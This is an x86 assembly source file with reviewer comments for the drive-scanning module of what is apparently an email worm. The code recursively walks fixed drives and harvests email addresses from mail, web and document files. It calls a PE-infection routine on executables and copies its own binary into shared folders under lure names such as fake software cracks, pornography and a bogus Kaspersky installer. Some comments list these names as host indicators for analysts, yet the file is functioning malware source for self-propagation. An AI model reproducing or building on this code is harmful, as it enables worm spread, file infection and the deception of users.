📄 hddscanner.asm
; Recursive filesystem scanner
; ----------------------------
; Static strings used by the drive scanner below.
.data
; Path separator appended to a directory path before recursing into it.
szHDDSlash db "\",0
; Wildcard appended to the current path to enumerate every entry via FindFirstFile.
szHDDSearchMask db "*.*",0
; Double-NUL-terminated list walked by HDDProcessFile. Each entry is searched
; for case-insensitively (StrStrI) anywhere in the full file path; a file that
; matches is handed to EmailScanFile.
szScanExtension db ".wab",0,".txt",0,".msg",0,".htm",0,".shtm",0,".stm",0,".xml",0,".dbx",0,".mbx",0,".mdx",0,".eml",0,".nch",0,".mmf",0,".ods",0,".cfg",0,".asp",0,".php",0,".pl",0
db ".wsh",0,".adb",0,".tbb",0,".sht",0,".xls",0,".oft",0,".uin",0,".cgi",0,".mht",0,".dhtm",0,".jsp",0,0
; Substring tested against each directory name in HDDScanFromPath; a directory
; whose name contains it is passed to HDDCopySelfToShares.
; NOTE(review): "shar" looks chosen to match names such as "Shared"/"shares" - inferred, not stated here.
szShar db "shar",0
; Test builds scan only this fixed folder instead of enumerating drives (see HDDScanDrives).
IFDEF TESTVERSION
szHDDBasePath db "C:\Emails\",0
ENDIF
; Double-NUL-terminated list of destination file names used by HDDCopySelfToShares.
; For analysts: these exact names appearing together inside a directory whose
; name contains "shar" are a host-side indicator for this sample. Two entries
; ("KAV 5.0", "Kaspersky Antivirus 5.0") are written without any extension.
szSharNames db "Microsoft Office 2003 Crack, Working!.exe",0
db "Microsoft Windows XP, WinXP Crack, working Keygen.exe",0
db "Microsoft Office XP working Crack, Keygen.exe",0
db "Porno, sex, oral, anal cool, awesome!!.exe",0
db "Porno Screensaver.scr",0
db "Serials.txt.exe",0
db "KAV 5.0",0
db "Kaspersky Antivirus 5.0",0
db "Porno pics arhive, xxx.exe",0
db "Windows Sourcecode update.doc.exe",0
db "Ahead Nero 7.exe",0
db "Windown Longhorn Beta Leak.exe",0
db "Opera 8 New!.exe",0
db "XXX hardcore images.exe",0
db "WinAmp 6 New!.exe",0
db "WinAmp 5 Pro Keygen Crack Update.exe",0
db "Adobe Photoshop 9 full.exe",0
db "Matrix 3 Revolution English Subtitles.exe",0
db "ACDSee 9.exe",0,0
.code
EmailAddToQueue proto :DWORD
;-----------------------------------------------------------------------
; HDDCopySelfToShares(lpPath)
; For each name in szSharNames, builds lpPath + name in a scratch buffer and
; copies the file named by szSysDirFileName to that destination.
; In:    lpPath = directory path; the only caller in this listing passes it
;        with a trailing "\" already appended.
; Regs:  edi = cursor into szSharNames (saved/restored through `uses edi`).
; NOTE(review): szSysDirFileName is defined outside this listing - presumably
;        the path of the program's own installed copy; confirm.
; NOTE(review): the GlobalAlloc result is used without a NULL check.
;-----------------------------------------------------------------------
HDDCopySelfToShares proc uses edi lpPath: DWORD
LOCAL adv_path: DWORD
; Scratch buffer for the destination path.
invoke GlobalAlloc, GMEM_FIXED, 65000
mov adv_path, eax
mov edi, offset szSharNames
@next:
; Second lstrcat argument (current list entry), pushed ahead of time;
; the lstrcpy call in between cleans up only its own arguments.
push edi
invoke lstrcpy, adv_path, lpPath
push adv_path
; lstrcat(adv_path, edi): adv_path = lpPath + current name.
call lstrcat
; bFailIfExists = TRUE: an existing file with the same name is left untouched.
invoke CopyFile, offset szSysDirFileName, adv_path, TRUE
; NOTE(review): mNextListEntry is a macro defined outside this listing -
; presumably it advances edi to the next entry and jumps to @next until the
; empty terminating entry is reached; confirm against its definition.
mNextListEntry @next
invoke GlobalFree, adv_path
ret
HDDCopySelfToShares endp
;-----------------------------------------------------------------------
; HDDProcessFile(szFullFilePath)
; Called for every regular file found by HDDScanFromPath. Checks the path
; against the szScanExtension list and, on the first hit, passes the file to
; EmailScanFile with EmailAddToQueue as callback. Unless DisableInfect is
; defined at build time, a path containing szExeExe is also passed to InfectPE.
; Regs:  edi = cursor into szScanExtension (saved/restored through `uses edi`).
; NOTE(review): EmailScanFile, InfectPE and szExeExe are defined outside this
;        listing; their behaviour is not visible here.
; Note:  matching uses StrStrI on the whole path, so an entry matches anywhere
;        in the path (including directory names), not only as a file suffix.
;-----------------------------------------------------------------------
HDDProcessFile proc uses edi szFullFilePath: DWORD
mov edi, offset szScanExtension
@next:
cld
; edx = current list entry; scasb then moves edi past its NUL terminator,
; i.e. to the start of the next entry.
mov edx, edi
xor eax, eax
or ecx, -1
repnz scasb
invoke StrStrI, szFullFilePath, edx
.IF eax
; First matching entry: hand the file over and stop walking the list.
invoke EmailScanFile, szFullFilePath, offset EmailAddToQueue
.ELSE
; An empty entry (second NUL) marks the end of the list.
cmp byte ptr[edi], 0
jnz @next
.ENDIF
IFNDEF DisableInfect
invoke StrStrI, szFullFilePath, offset szExeExe
.IF eax
invoke InfectPE, szFullFilePath
.ENDIF
ENDIF
ret
HDDProcessFile endp
;-----------------------------------------------------------------------
; HDDScanFromPath(lpPath, szBasePath)
; Recursively enumerates the directory in lpPath. Regular files go to
; HDDProcessFile; every subdirectory is descended into, and a subdirectory
; whose name contains szShar ("shar", case-insensitive) is first passed to
; HDDCopySelfToShares.
; In:    lpPath     = writable buffer holding the directory path; it is
;                     extended and truncated in place during the walk.
;                     NOTE(review): presumably ends with "\" - the search mask
;                     is appended directly; confirm against callers.
;        szBasePath = only forwarded to the recursive call in this procedure.
; Regs:  edi = length of lpPath on entry, used to truncate the buffer back
;        after each entry (saved/restored through `uses edi`).
; NOTE(review): no length check is visible before the lstrcat calls; the
;        buffer size is whatever the caller allocated (65536 in HDDScanDrive).
;-----------------------------------------------------------------------
HDDScanFromPath proc uses edi lpPath, szBasePath: DWORD
LOCAL hFind: DWORD
LOCAL FindFileData: DWORD
; WIN32_FIND_DATA is heap-allocated per recursion level rather than kept on the stack.
invoke LocalAlloc, GPTR, sizeof WIN32_FIND_DATA
mov FindFileData, eax
invoke lstrlen, lpPath
mov edi, eax
invoke lstrcat, lpPath, offset szHDDSearchMask
invoke FindFirstFile, lpPath, FindFileData
mov hFind, eax
; INVALID_HANDLE_VALUE is -1, so eax + 1 == 0 means the search failed.
inc eax
jz @end
@find_loop:
; Cut lpPath back to the directory path it held on entry.
mov eax, lpPath
mov byte ptr[eax + edi], 0
mov edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.cFileName
; 16-bit compare against '.' followed by NUL: the name is exactly ".".
cmp word ptr[edx], '.'
jz @skip
; 16-bit compare against "..": this skips any name that begins with two dots.
cmp word ptr[edx], '..'
jz @skip
invoke lstrcat, lpPath, edx
mov edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.dwFileAttributes
test dword ptr[edx], FILE_ATTRIBUTE_DIRECTORY
jz @file
; Check whether the directory name (text after the last '\') contains "shar"
invoke StrRChr, lpPath, NULL, '\'
.IF eax
inc eax
invoke StrStrI, eax, offset szShar
.ENDIF
; Keep the match result (0 = no match) across the lstrcat call below.
push eax
; Process Directory
invoke lstrcat, lpPath, offset szHDDSlash
pop eax
.IF eax
invoke HDDCopySelfToShares, lpPath
.ENDIF
; Descend into the subdirectory regardless of the name match.
invoke HDDScanFromPath, lpPath, szBasePath
jmp @skip
@file:
; Process File
invoke HDDProcessFile, lpPath
@skip:
; 2 ms pause after every directory entry.
; NOTE(review): presumably throttles disk/CPU use during the walk - intent not stated.
invoke Sleep, 2
invoke FindNextFile, hFind, FindFileData
test eax, eax
jnz @find_loop
invoke FindClose, hFind
@end:
invoke LocalFree, FindFileData
ret
HDDScanFromPath endp
;-----------------------------------------------------------------------
; HDDScanDrive(szDrive)
; Copies the root path in szDrive into a freshly allocated 65536-byte working
; buffer and starts the recursive walk from it.
; In:    szDrive = NUL-terminated root path (a drive string from
;        GetLogicalDriveStrings, or szHDDBasePath in test builds).
;-----------------------------------------------------------------------
HDDScanDrive proc szDrive: DWORD
LOCAL szLongPath: DWORD
; Working path buffer that HDDScanFromPath extends in place.
invoke GlobalAlloc, GPTR, 65536
mov szLongPath, eax
invoke lstrcpy, eax, szDrive
; lstrcpy returns NULL on failure; the scan is skipped in that case.
.IF eax
; The same buffer is passed as both the current path and the base path.
invoke HDDScanFromPath, szLongPath, szLongPath
.ENDIF
invoke GlobalFree, szLongPath
ret
HDDScanDrive endp
;-----------------------------------------------------------------------
; HDDScanDrives()
; Entry point of the scanner. Enumerates the logical drive strings and runs
; HDDScanDrive on every drive that GetDriveType reports as DRIVE_FIXED; other
; drive types are skipped by this routine. When built with TESTVERSION, only
; the folder in szHDDBasePath is scanned.
; Regs:  esi = cursor into the drive-string list (saved/restored through `uses esi`).
; NOTE(review): the GlobalAlloc result is used without a NULL check.
;-----------------------------------------------------------------------
HDDScanDrives proc uses esi
LOCAL DrvBuf: DWORD
invoke GlobalAlloc, GPTR, 8192
mov DrvBuf, eax
; Fills DrvBuf with NUL-separated root paths, terminated by an empty string.
invoke GetLogicalDriveStrings, 8191, eax
mov esi, DrvBuf
IFDEF TESTVERSION
invoke HDDScanDrive, offset szHDDBasePath
ELSE
@get_next_drv:
; An empty string marks the end of the drive list.
.IF byte ptr[esi]
invoke GetDriveType, esi
.IF eax == DRIVE_FIXED
invoke HDDScanDrive, esi
.ENDIF
; Advance esi past the current string and its NUL terminator.
invoke lstrlen, esi
add esi, eax
inc esi
jmp @get_next_drv
.ENDIF
ENDIF
invoke GlobalFree, DrvBuf
ret
HDDScanDrives endp